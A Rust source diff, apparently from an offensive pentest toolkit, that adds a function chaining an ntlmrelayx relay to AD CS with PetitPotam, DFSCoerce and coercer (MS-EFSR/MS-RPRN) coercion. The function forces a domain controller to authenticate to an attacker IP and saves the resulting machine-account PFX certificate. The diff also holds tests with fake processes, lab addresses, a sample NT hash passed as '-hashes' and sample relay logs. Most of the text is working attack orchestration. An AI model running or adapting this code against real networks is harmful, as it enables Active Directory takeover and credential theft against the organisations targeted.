+        .run_phase(
+            &coerce_log,
+            "Phase 1: unauth PetitPotam",
+            petit_bin,
+            &p1_args,
+            &workdir,
+            25,
+        )
+        .await;
+    if poll_for_cert(&relay_log, opts.poll_phase_1, opts.poll_interval).await {
+        captured_via = Some("unauth_petitpotam");
+    }
+
+    // --- Phase 2: authenticated DFSCoerce ---
+    if captured_via.is_none() && cfg.coerce_user.is_some() {
+        summary.push_str("=== Phase 2: authenticated DFSCoerce (MS-DFSNM) ===\n");
+        let user = cfg.coerce_user.as_deref().unwrap();
+        let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref());
+        let mut a: Vec<&str> = vec!["-u", user, "-d", cfg.coerce_domain.as_str()];
+        for s in &secret_args {
+            a.push(s.as_str());
+        }
+        a.push(cfg.attacker_ip.as_str());
+        a.push(cfg.coerce_target.as_str());
+        procs
+            .run_phase(
+                &coerce_log,
+                "Phase 2: DFSCoerce",
+                "dfscoerce",
+                &a,
+                &workdir,
+                25,
+            )
+            .await;
+        if poll_for_cert(&relay_log, opts.poll_phase_2, opts.poll_interval).await {
+            captured_via = Some("MS-DFSNM");
+        }
+    }
+
+    // --- Phase 3: coercer over MS-EFSR / MS-RPRN ---
+    if captured_via.is_none() && cfg.coerce_user.is_some() {
+        let user = cfg.coerce_user.as_deref().unwrap();
+        let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref());
+        for proto in ["MS-EFSR", "MS-RPRN"] {
+            summary.push_str(&format!(
+                "=== Phase 3: authenticated coerce via {proto} ===\n"
+            ));
+            let mut a: Vec<&str> = vec![
+                "coerce",
+                "-u",
+                user,
+                "-d",
+                cfg.coerce_domain.as_str(),
+                "-t",
+                cfg.coerce_target.as_str(),
+                "-l",
+                cfg.attacker_ip.as_str(),
+                "--filter-protocol-name",
+                proto,
+                "--auth-type",
+                "smb",
+                "--always-continue",
+            ];
+            for s in &secret_args {
+                a.push(s.as_str());
+            }
+            procs
+                .run_phase(
+                    &coerce_log,
+                    &format!("Phase 3: {proto}"),
+                    "coercer",
+                    &a,
+                    &workdir,
+                    25,
+                )
+                .await;
+            if poll_for_cert(&relay_log, opts.poll_phase_3, opts.poll_interval).await {
+                captured_via = Some(proto);
+                break;
+            }
+        }
+    }
+
+    // Allow any in-flight ADCS request to finish writing the cert.
+    if captured_via.is_some() {
+        sleep(opts.post_capture_settle).await;
+    }
+
+    relay.kill_and_wait(opts.relay_kill_timeout).await;
+
+    // Extract cert from the relay log if captured. Two ntlmrelayx output
+    // shapes need handling:
+    // 1. `--adcs` (our path) — writes the PFX to disk and logs
+    //    "Writing PKCS#12 certificate to ./<user>.pfx" + earlier
+    //    "Authenticating connection from <domain>/<user>$@ip" lines.
+    // 2. `--ldap` userCertificate — logs "Base64 certificate of user <user>:"
+    //    followed by the base64 blob on the next line. Kept as fallback.
+    let mut pfx_path: Option<PathBuf> = None;
+    let mut relayed_user: Option<String> = None;
+    if captured_via.is_some() {
+        let log = tokio::fs::read_to_string(&relay_log)
+            .await
+            .unwrap_or_default();
+
+        if let Some(cap) = extract_pfx_capture_from_log(&log) {
+            let bare = cap.pfx_basename.trim_start_matches("./");
+            let candidate = workdir.join(bare);
+            if tokio::fs::metadata(&candidate).await.is_ok() {
+                pfx_path = Some(candidate);
+                relayed_user = Some(cap.user);
+            }
+        }
+
+        if pfx_path.is_none() {
+            if let Some((user, b64)) = extract_cert_from_log(&log) {
+                let pfx = workdir.join(format!("{user}.pfx"));
+                let cleaned: String = b64.chars().filter(|c| !c.is_whitespace()).collect();
+                if let Ok(bytes) = base64::engine::general_purpose::STANDARD.decode(&cleaned) {
+                    if !bytes.is_empty() && tokio::fs::write(&pfx, &bytes).await.is_ok() {
+                        pfx_path = Some(pfx);
+                        relayed_user = Some(user);
+                    }
+                }
+            }
+        }
+    }
+
+    let mut stdout = summary;
+    if let Some(via) = captured_via {
+        stdout.push_str(&format!("CERT_CAPTURED_VIA={via}\n"));
+    }
+    if let (Some(p), Some(u)) = (pfx_path.as_ref(), relayed_user.as_ref()) {
+        stdout.push_str(&format!("PFX_FILE={}\n", p.display()));
+        stdout.push_str(&format!("RELAYED_USER={u}\n"));
+    }
+    stdout.push_str("=== RELAY LOG ===\n");
+    stdout.push_str(
+        &tokio::fs::read_to_string(&relay_log)
+            .await
+            .unwrap_or_default(),
+    );
+    stdout.push_str("=== COERCE LOG ===\n");
+    stdout.push_str(
+        &tokio::fs::read_to_string(&coerce_log)
+            .await
+            .unwrap_or_default(),
+    );
+
+    let success = pfx_path.is_some();
+
+    // Persist workdir if we resolved a PFX OR if a cert was captured (so
+    // operators can debug extraction failures without losing the artifact).
+    if (success || captured_via.is_some()) && opts.keep_workdir_on_capture {
+        let _ = tempdir.keep();
+    }
+
+    Ok(ToolOutput {
+        stdout,
+        stderr: String::new(),
+        exit_code: Some(if success { 0 } else { 1 }),
+        success,
+    })
+}
+
+fn coerce_secret_args(secret: Option<&CoerceSecret>) -> Vec<String> {
+    match secret {
+        Some(CoerceSecret::Hash(h)) => vec!["-hashes".into(), format!(":{h}")],
+        Some(CoerceSecret::Password(p)) => vec!["-p".into(), p.clone()],
+        None => Vec::new(),
+    }
+}
+
+async fn append_output(path: &Path, header: &str, output: &std::process::Output) {
+    use tokio::io::AsyncWriteExt;
+    if let Ok(mut f) = tokio::fs::OpenOptions::new()
+        .create(true)
+        .append(true)
+        .open(path)
+        .await
+    {
+        let _ = f.write_all(b"=== ").await;
+        let _ = f.write_all(header.as_bytes()).await;
+        let _ = f.write_all(b" ===\n").await;
+        let _ = f.write_all(&output.stdout).await;
+        let _ = f.write_all(&output.stderr).await;
+        let _ = f.write_all(b"\n").await;
+    }
+}
+
+async fn append_error(path: &Path, header: &str, msg: &str) {
+    use tokio::io::AsyncWriteExt;
+    if let Ok(mut f) = tokio::fs::OpenOptions::new()
+        .create(true)
+        .append(true)
+        .open(path)
+        .await
+    {
+        let _ = f.write_all(b"=== ").await;
+        let _ = f.write_all(header.as_bytes()).await;
+        let _ = f.write_all(b" ===\n[ERROR] ").await;
+        let _ = f.write_all(msg.as_bytes()).await;
+        let _ = f.write_all(b"\n").await;
+    }
+}
+
+async fn poll_for_cert(relay_log: &Path, max: Duration, interval: Duration) -> bool {
+    let deadline = Instant::now() + max;
+    loop {
+        if let Ok(s) = tokio::fs::read_to_string(relay_log).await {
+            // `--adcs` writes "GOT CERTIFICATE! ID <id>" then "Writing PKCS#12 …".
+ // `--ldap` userCertificate writes "Base64 certificate of user …".
+ if s.contains("Base64 certificate of user")
+ || s.contains("GOT CERTIFICATE!")
+ || s.contains("Writing PKCS#12 certificate to")
+ {
+ return true;
+ }
+ }
+ let now = Instant::now();
+ if now >= deadline {
+ return false;
+ }
+ let wait = std::cmp::min(interval, deadline - now);
+ sleep(wait).await;
+ }
+}
+
+/// Captured-cert metadata for the `--adcs` path: ntlmrelayx writes the PFX to
+/// disk relative to its CWD and logs the path.
+#[derive(Debug, Clone, PartialEq, Eq)]
+struct PfxCapture {
+ user: String,
+ pfx_basename: String,
+}
+
+/// Walk the relay log, pair the most-recent authenticating-as-user line with
+/// the most-recent "Writing PKCS#12 certificate to <path>" line. Returns None
+/// if either marker is missing.
+fn extract_pfx_capture_from_log(log: &str) -> Option<PfxCapture> {
+ let mut last_user: Option<String> = None;
+ let mut last_pfx: Option<String> = None;
+
+ for line in log.lines() {
+ // "[*] Authenticating against http://... as DOMAIN/USER$ SUCCEED"
+ // "[*] SMBD-Thread-N: Connection from DOMAIN/USER$@ip controlled, attacking..."
+ // Both shapes appear depending on flow; pull the user after the slash.
+ if let Some(user) = parse_relayed_user(line) {
+ last_user = Some(user);
+ }
+ // "[*] Writing PKCS#12 certificate to ./DC01.pfx"
+ if let Some(idx) = line.find("Writing PKCS#12 certificate to ") {
+ let after = &line[idx + "Writing PKCS#12 certificate to ".len()..];
+ let path = after.split_whitespace().next().unwrap_or("");
+ if !path.is_empty() {
+ last_pfx = Some(path.to_string());
+ }
+ }
+ }
+
+ match (last_user, last_pfx) {
+ (Some(u), Some(p)) => Some(PfxCapture {
+ user: u,
+ pfx_basename: p,
+ }),
+ // If we got a PFX path but no user, fall back to the file's basename
+ // (ntlmrelayx names the PFX after the user).
+ (None, Some(p)) => {
+ let base = std::path::Path::new(p.trim_start_matches("./"))
+ .file_stem()
+ .and_then(|s| s.to_str())
+ .unwrap_or("relayed")
+ .to_string();
+ Some(PfxCapture {
+ user: base,
+ pfx_basename: p,
+ })
+ }
+ _ => None,
+ }
+}
+
+/// Pull a relayed username out of a line that looks like
+/// "DOMAIN/USERNAME$@target" or "DOMAIN/USERNAME@target". Returns the bare
+/// username including any trailing `$`.
+fn parse_relayed_user(line: &str) -> Option<String> {
+ let at_idx = line.find('@')?;
+ let prefix = &line[..at_idx];
+ // Walk backwards from '@' to the slash that splits domain/user.
+ let user_start = prefix.rfind('/')? + 1;
+ let candidate: &str = prefix[user_start..]
+ .split_terminator(|c: char| c.is_whitespace())
+ .next()?;
+ if candidate.is_empty() {
+ return None;
+ }
+ // Heuristic — usernames here are word chars + an optional trailing $.
+ if !candidate
+ .chars()
+ .all(|c| c.is_alphanumeric() || c == '$' || c == '_' || c == '-' || c == '.')
+ {
+ return None;
+ }
+ Some(candidate.to_string())
+}
+
+/// Parse the relay.log for the LAST captured cert. ntlmrelayx prints
+/// `Base64 certificate of user <USER>:` followed by the base64 blob on the
+/// next non-empty line. Returns (user, base64_blob).
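+///
+/// Illustrative log shape (mirrors the fixture in the tests below):
+///
+/// ```text
+/// [*] Base64 certificate of user DC2$:
+/// MIIBlahSecondCert==
+/// ```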
+fn extract_cert_from_log(log: &str) -> Option<(String, String)> {
+ let mut last_user: Option<String> = None;
+ let mut last_b64: Option<String> = None;
+ let mut pending_user: Option<String> = None;
+
+ for line in log.lines() {
+ if let Some(idx) = line.find("Base64 certificate of user ") {
+ let after = &line[idx + "Base64 certificate of user ".len()..];
+ let name = after
+ .split_whitespace()
+ .next()
+ .unwrap_or("")
+ .trim_end_matches(':');
+ if !name.is_empty() {
+ pending_user = Some(name.to_string());
+ }
+ continue;
+ }
+ if let Some(user) = &pending_user {
+ let trimmed = line.trim();
+ if !trimmed.is_empty() {
+ last_user = Some(user.clone());
+ last_b64 = Some(trimmed.to_string());
+ pending_user = None;
+ }
+ }
+ }
+
+ match (last_user, last_b64) {
+ (Some(u), Some(b)) => Some((u, b)),
+ _ => None,
+ }
+}
+
 /// Relay captured NTLM authentication to multiple targets.
 ///
 /// Optional args: `targets_file`, `target_ips` (comma-separated), `dump_sam`
@@ -336,6 +1209,623 @@ mod tests {
 assert!(ntlmrelayx_to_smb(&args).await.is_ok());
 }
 
+ #[tokio::test]
+ async fn relay_and_coerce_requires_secret() {
+ let args = json!({
+ "ca_host": "192.168.58.10",
+ "coerce_target": "192.168.58.20",
+ "attacker_ip": "192.168.58.100",
+ "coerce_user": "alice",
+ "coerce_domain": "contoso.local"
+ });
+ let err = relay_and_coerce(&args).await.unwrap_err().to_string();
+ assert!(err.contains("coerce_hash") || err.contains("coerce_password"));
+ }
+
+ #[tokio::test]
+ async fn relay_and_coerce_rejects_quote_in_inputs() {
+ let args = json!({
+ "ca_host": "192.168.58.10",
+ "coerce_target": "192.168.58.20",
+ "attacker_ip": "192.168.58.100",
+ "coerce_user": "alice",
+ "coerce_domain": "contoso.local",
+ "coerce_password": "p'ass"
+ });
+ let err = relay_and_coerce(&args).await.unwrap_err().to_string();
+ assert!(err.contains("forbidden"));
+ }
+
+ #[tokio::test]
+ async fn relay_and_coerce_rejects_same_host() {
+ let args = json!({
+ "ca_host": "192.168.58.10",
+ "coerce_target": "192.168.58.10",
+ "attacker_ip": "192.168.58.100",
+ "coerce_user": "alice",
+ "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755",
+ "coerce_domain": "contoso.local"
+ });
+ let err = relay_and_coerce(&args).await.unwrap_err().to_string();
+ assert!(err.contains("must differ") || err.contains("loopback"));
+ }
+
+ #[test]
+ fn parse_relay_coerce_args_accepts_legacy_target_dc_alias() {
+ let args = json!({
+ "ca_host": "192.168.58.10",
+ "target_dc": "192.168.58.20",
+ "attacker_ip": "192.168.58.100",
+ "coerce_user": "alice",
+ "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755",
+ "coerce_domain": "contoso.local"
+ });
+ let cfg = super::parse_relay_coerce_args(&args).expect("legacy alias should parse");
+ assert_eq!(cfg.coerce_target, "192.168.58.20");
+ }
+
+ #[test]
+ fn parse_relay_coerce_args_with_hash() {
+ let args = json!({
+ "ca_host": "192.168.58.10",
+ "coerce_target": "192.168.58.20",
+ "attacker_ip": "192.168.58.100",
+ "coerce_user": "alice",
+ "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755",
+ "coerce_domain": "contoso.local"
+ });
+ let cfg = super::parse_relay_coerce_args(&args).expect("valid args should parse");
+ assert!(matches!(
+ cfg.coerce_secret,
+ Some(super::CoerceSecret::Hash(_))
+ ));
+ }
+
+ #[test]
+ fn parse_relay_coerce_args_unauth() {
+ let args = json!({
+ "ca_host": "192.168.58.10",
+ "coerce_target": "192.168.58.20",
+ "attacker_ip": "192.168.58.100"
+ });
+ let cfg = super::parse_relay_coerce_args(&args).expect("unauth args should parse");
+ assert!(cfg.coerce_user.is_none());
+ 
assert!(cfg.coerce_secret.is_none());
+ }
+
+ // ── Phase-progression coverage via FakeCoerceProcs ─────────────────────
+
+ use std::collections::{HashMap, HashSet};
+ use std::sync::Mutex;
+
+ #[derive(Default, Clone)]
+ struct PhaseScript {
+ relay_log_append: Vec<u8>,
+ /// (basename, bytes) — written into workdir when run_phase fires.
+ pfx_drop: Option<(String, Vec<u8>)>,
+ }
+
+ #[derive(Debug, Clone)]
+ struct RecordedPhaseCall {
+ header: String,
+ bin: String,
+ args: Vec<String>,
+ }
+
+ struct FakeState {
+ is_local_ip: bool,
+ local_ips: Vec<String>,
+ binaries_present: HashSet<String>,
+ relay_early_exit: Option<i32>,
+ relay_initial_log: Vec<u8>,
+ relay_log_path: Option<PathBuf>,
+ coerce_log_path: Option<PathBuf>,
+ phase_scripts: HashMap<String, PhaseScript>,
+ run_phase_calls: Vec<RecordedPhaseCall>,
+ }
+
+ struct FakeCoerceProcs {
+ state: Mutex<FakeState>,
+ }
+
+ impl FakeCoerceProcs {
+ fn new() -> Self {
+ Self {
+ state: Mutex::new(FakeState {
+ is_local_ip: true,
+ local_ips: vec!["10.0.0.1".into()],
+ binaries_present: ["petitpotam".to_string()].into_iter().collect(),
+ relay_early_exit: None,
+ relay_initial_log: Vec::new(),
+ relay_log_path: None,
+ coerce_log_path: None,
+ phase_scripts: HashMap::new(),
+ run_phase_calls: Vec::new(),
+ }),
+ }
+ }
+
+ fn with_local_ip(self, allowed: bool) -> Self {
+ self.state.lock().unwrap().is_local_ip = allowed;
+ self
+ }
+
+ fn with_only_binary(self, names: &[&str]) -> Self {
+ let mut s = self.state.lock().unwrap();
+ s.binaries_present.clear();
+ for n in names {
+ s.binaries_present.insert((*n).to_string());
+ }
+ drop(s);
+ self
+ }
+
+ fn with_relay_exit(self, code: i32) -> Self {
+ self.state.lock().unwrap().relay_early_exit = Some(code);
+ self
+ }
+
+ fn with_relay_initial_log(self, bytes: &[u8]) -> Self {
+ self.state.lock().unwrap().relay_initial_log = bytes.to_vec();
+ self
+ }
+
+ fn with_phase_capture(self, header: &str, log_append: &[u8]) -> Self {
+ self.state.lock().unwrap().phase_scripts.insert(
+ header.to_string(),
+ PhaseScript {
+ relay_log_append: log_append.to_vec(),
+ pfx_drop: None,
+ },
+ );
+ self
+ }
+
+ fn with_phase_pfx_drop(
+ self,
+ header: &str,
+ log_append: &[u8],
+ pfx_basename: &str,
+ pfx_bytes: &[u8],
+ ) -> Self {
+ self.state.lock().unwrap().phase_scripts.insert(
+ header.to_string(),
+ PhaseScript {
+ relay_log_append: log_append.to_vec(),
+ pfx_drop: Some((pfx_basename.to_string(), pfx_bytes.to_vec())),
+ },
+ );
+ self
+ }
+
+ fn calls(&self) -> Vec<RecordedPhaseCall> {
+ self.state.lock().unwrap().run_phase_calls.clone()
+ }
+ }
+
+ struct FakeRelayHandle {
+ pid: u32,
+ early_exit: Option<i32>,
+ }
+
+ impl super::RelayHandle for FakeRelayHandle {
+ fn pid(&self) -> u32 {
+ self.pid
+ }
+ async fn settle_then_try_wait(&mut self, _settle: Duration) -> Option<i32> {
+ self.early_exit.take()
+ }
+ async fn kill_and_wait(&mut self, _timeout: Duration) {}
+ }
+
+ impl super::CoerceProcs for FakeCoerceProcs {
+ type Handle = FakeRelayHandle;
+
+ fn is_local_ip(&self, _ip: &str) -> bool {
+ self.state.lock().unwrap().is_local_ip
+ }
+
+ fn list_local_ips(&self) -> Vec<String> {
+ self.state.lock().unwrap().local_ips.clone()
+ }
+
+ fn which_binary(&self, name: &str) -> bool {
+ self.state.lock().unwrap().binaries_present.contains(name)
+ }
+
+ async fn cleanup_stale_listeners(&self, _workdir: &Path) {}
+
+ async fn spawn_relay(
+ &self,
+ _target_url: &str,
+ _template: &str,
+ relay_log: &Path,
+ _workdir: &Path,
+ ) -> Result<Self::Handle> {
+ let (initial_log, early_exit) = {
+ let mut s = self.state.lock().unwrap();
+ s.relay_log_path = Some(relay_log.to_path_buf());
+ (s.relay_initial_log.clone(), s.relay_early_exit)
+ };
+ 
tokio::fs::write(relay_log, &initial_log) + .await + .context("fake spawn_relay: write initial relay.log")?; + Ok(FakeRelayHandle { + pid: 4242, + early_exit, + }) + } + + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + _timeout_secs: u64, + ) { + let (script, relay_log) = { + let mut s = self.state.lock().unwrap(); + s.coerce_log_path = Some(coerce_log.to_path_buf()); + s.run_phase_calls.push(RecordedPhaseCall { + header: header.to_string(), + bin: bin.to_string(), + args: args.iter().map(|x| (*x).to_string()).collect(), + }); + let relay_log = s + .relay_log_path + .clone() + .unwrap_or_else(|| cwd.join("relay.log")); + (s.phase_scripts.get(header).cloned(), relay_log) + }; + // Append a phase header line to coerce.log so the path contract is + // observable — production appends real subprocess output here. + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(coerce_log) + .await + { + let _ = f.write_all(format!("{header}\n").as_bytes()).await; + } + if let Some(script) = script { + if !script.relay_log_append.is_empty() { + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&relay_log) + .await + { + let _ = f.write_all(&script.relay_log_append).await; + } + } + if let Some((basename, bytes)) = &script.pfx_drop { + let _ = tokio::fs::write(cwd.join(basename), bytes).await; + } + } + } + } + + fn fast_opts() -> super::RunOptions { + super::RunOptions { + relay_settle: Duration::from_millis(0), + poll_interval: Duration::from_millis(2), + poll_phase_1: Duration::from_millis(15), + poll_phase_2: Duration::from_millis(15), + poll_phase_3: Duration::from_millis(15), + post_capture_settle: Duration::from_millis(0), + relay_kill_timeout: Duration::from_millis(15), + keep_workdir_on_capture: false, + // Tests run in parallel and would otherwise fight over the + // single host-wide loopback sentinel port. + acquire_host_lock: false, + } + } + + fn cfg_unauth() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: None, + coerce_domain: String::new(), + coerce_secret: None, + template: "DomainController".into(), + } + } + + fn cfg_with_creds() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: Some("alice".into()), + coerce_domain: "contoso.local".into(), + coerce_secret: Some(super::CoerceSecret::Hash( + "b8d76e56e9dac90539aff05e3ccb1755".into(), + )), + template: "DomainController".into(), + } + } + + const PHASE1: &str = "Phase 1: unauth PetitPotam"; + const PHASE2: &str = "Phase 2: DFSCoerce"; + const PHASE3_EFSR: &str = "Phase 3: MS-EFSR"; + const PHASE3_RPRN: &str = "Phase 3: MS-RPRN"; + + #[tokio::test] + async fn run_attacker_ip_not_local_bails_with_clear_error() { + let fake = FakeCoerceProcs::new().with_local_ip(false); + let err = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap_err() + .to_string(); + assert!(err.contains("not a local interface IP"), "got: {err}"); + } + + #[tokio::test] + async fn run_host_lock_contention_returns_busy_marker() { + // Hold the sentinel port ourselves to simulate another in-flight + // relay_and_coerce already running on this host. 
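+ // The "lock" here is a plain TCP bind on RELAY_LOCK_PORT: whoever holds
+ // the bound socket owns the relay slot, so binding it below stands in
+ // for a competing run.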
+ let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let mut opts = fast_opts(); + opts.acquire_host_lock = true; + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, opts) + .await + .unwrap(); + assert!(!out.success); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY, got: {}", + out.stdout + ); + // No phases or relay spawn should fire when the lock is contended. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn ntlmrelayx_to_smb_returns_busy_when_lock_held() { + let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let args = json!({"target_ip": "192.168.58.1"}); + let out = super::ntlmrelayx_to_smb(&args).await.unwrap(); + assert!(!out.success, "expected BUSY non-success, got success"); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY in stdout, got: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_relay_bind_failure_returns_marker() { + let fake = FakeCoerceProcs::new() + .with_relay_exit(98) + .with_relay_initial_log(b"OSError: [Errno 98] Address already in use\n"); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert_eq!(out.exit_code, Some(98)); + assert!(out.stdout.contains("RELAY_BIND_FAILED")); + assert!(out.stdout.contains("Address already in use")); + // No phases should run when the relay died at startup. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn run_phase1_capture_skips_phase2_and_3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] GOT CERTIFICATE! ID 1\n\ + [*] Writing PKCS#12 certificate to ./DC01.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE1, log, "DC01.pfx", b"\xab\xcd"); + // Provide creds so we can verify phases 2/3 are skipped DESPITE creds. 
+ let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts())
+ .await
+ .unwrap();
+ assert!(out.success);
+ assert!(out.stdout.contains("CERT_CAPTURED_VIA=unauth_petitpotam"));
+ assert!(out.stdout.contains("RELAYED_USER=DC01$"));
+ assert!(out.stdout.contains("PFX_FILE="));
+ let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect();
+ assert_eq!(headers, vec![PHASE1]);
+ }
+
+ #[tokio::test]
+ async fn run_phase1_miss_no_creds_skips_phase2_and_3() {
+ let fake = FakeCoerceProcs::new();
+ let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts())
+ .await
+ .unwrap();
+ assert!(!out.success);
+ assert!(!out.stdout.contains("CERT_CAPTURED_VIA"));
+ let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect();
+ assert_eq!(headers, vec![PHASE1]);
+ }
+
+ #[tokio::test]
+ async fn run_phase2_capture_skips_phase3() {
+ let log = b"[*] (SMB): Authenticating CONTOSO/DC02$@192.168.58.20 SUCCEED\n\
+ [*] Writing PKCS#12 certificate to ./DC02.pfx\n";
+ let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE2, log, "DC02.pfx", b"\x01\x02");
+ let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts())
+ .await
+ .unwrap();
+ assert!(out.success);
+ assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-DFSNM"));
+ let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect();
+ assert_eq!(headers, vec![PHASE1, PHASE2]);
+ }
+
+ #[tokio::test]
+ async fn run_phase3_efsr_miss_rprn_capture() {
+ let log = b"[*] (SMB): Authenticating CONTOSO/DC03$@192.168.58.20 SUCCEED\n\
+ [*] Writing PKCS#12 certificate to ./DC03.pfx\n";
+ let fake =
+ FakeCoerceProcs::new().with_phase_pfx_drop(PHASE3_RPRN, log, "DC03.pfx", b"\x09");
+ let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts())
+ .await
+ .unwrap();
+ assert!(out.success);
+ assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-RPRN"));
+ let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect();
+ assert_eq!(headers, vec![PHASE1, PHASE2, PHASE3_EFSR, PHASE3_RPRN]);
+ }
+
+ #[tokio::test]
+ async fn run_ldap_base64_extraction_decodes_to_workdir() {
+ // Encode known plaintext so we can verify the decode path. The fake
+ // emits both the "Authenticating ... DC01$@..." line AND a
+ // "Base64 certificate of user DC01$:" block. extract_pfx_capture
+ // returns None (no PKCS#12 line), so the LDAP base64 path runs.
+ let pfx_bytes = b"PKCS12-FAKE";
+ let b64 = base64::engine::general_purpose::STANDARD.encode(pfx_bytes);
+ let mut log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\
+ [*] Base64 certificate of user DC01$:\n"
+ .to_vec();
+ log.extend_from_slice(b64.as_bytes());
+ log.extend_from_slice(b"\n");
+ let fake = FakeCoerceProcs::new().with_phase_capture(PHASE1, &log);
+ let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts())
+ .await
+ .unwrap();
+ assert!(out.success, "stdout={}", out.stdout);
+ assert!(out.stdout.contains("RELAYED_USER=DC01$"));
+ // PFX_FILE should point at <workdir>/DC01$.pfx — confirm the
+ // marker appears with that filename suffix.
+ assert!(
+ out.stdout.contains("DC01$.pfx"),
+ "expected DC01$.pfx in stdout: {}",
+ out.stdout
+ );
+ }
+
+ #[tokio::test]
+ async fn run_petitpotam_binary_fallback_uses_impacket_name() {
+ let fake = FakeCoerceProcs::new().with_only_binary(&["impacket-petitpotam"]);
+ let _ = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts())
+ .await
+ .unwrap();
+ let calls = fake.calls();
+ let phase1 = calls
+ .iter()
+ .find(|c| c.header == PHASE1)
+ .expect("phase 1 should run");
+ assert_eq!(phase1.bin, "impacket-petitpotam");
+ }
+
+ #[tokio::test]
+ async fn run_phase2_passes_credentials() {
+ // No script: phase 2 misses, but we can inspect its argv.
+ let fake = FakeCoerceProcs::new();
+ let _ = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts())
+ .await
+ .unwrap();
+ let calls = fake.calls();
+ let phase2 = calls
+ .iter()
+ .find(|c| c.header == PHASE2)
+ .expect("phase 2 should run");
+ assert_eq!(phase2.bin, "dfscoerce");
+ // Hash secret must surface as `-hashes :<hash>`.
+ let joined = phase2.args.join(" ");
+ assert!(joined.contains("-hashes"), "args: {joined}");
+ assert!(joined.contains(":b8d76e56"), "args: {joined}");
+ assert!(joined.contains("-u alice"), "args: {joined}");
+ }
+
+ #[test]
+ fn extract_cert_from_log_picks_last_capture() {
+ // Two captures in one log; we want the last one.
+ let log = "\
+[*] Servers started, waiting for connections\n\
+[*] SMBD-Thread-1: Received connection from x\n\
+[*] Authenticating against http://ca/certsrv/ as DC1$\n\
+[*] Base64 certificate of user DC1$:\n\
+MIIBlahFirstCert==\n\
+[*] Servers started, waiting for connections\n\
+[*] Base64 certificate of user DC2$:\n\
+MIIBlahSecondCert==\n\
+[*] done\n";
+ let (user, b64) = super::extract_cert_from_log(log).expect("should extract");
+ assert_eq!(user, "DC2$");
+ assert_eq!(b64, "MIIBlahSecondCert==");
+ }
+
+ #[test]
+ fn extract_cert_from_log_returns_none_without_marker() {
+ let log = "[*] Servers started\n[*] no auth received\n";
+ assert!(super::extract_cert_from_log(log).is_none());
+ }
+
+ #[test]
+ fn extract_pfx_capture_picks_adcs_pair() {
+ // Real `--adcs` log shape captured during ntlmrelayx ADCS relay.
+ let log = "\
+[*] Servers started, waiting for connections\n\
+[*] SMBD-Thread-3: Received connection from 192.168.58.20, attacking target http://192.168.58.10/certsrv/certfnsh.asp\n\
+[*] (SMB): Authenticating against http://192.168.58.10/certsrv/certfnsh.asp CONTOSO/DC01$@192.168.58.20 SUCCEED [1]\n\
+[*] GOT CERTIFICATE! ID 6\n\
+[*] Writing PKCS#12 certificate to ./DC01.pfx\n\
+[*] done\n";
+ let cap = super::extract_pfx_capture_from_log(log).expect("should extract");
+ assert_eq!(cap.user, "DC01$");
+ assert_eq!(cap.pfx_basename, "./DC01.pfx");
+ }
+
+ #[test]
+ fn extract_pfx_capture_falls_back_to_basename_without_user() {
+ let log = "[*] Writing PKCS#12 certificate to ./MEMBER1.pfx\n";
+ let cap = super::extract_pfx_capture_from_log(log).expect("should extract");
+ assert_eq!(cap.user, "MEMBER1");
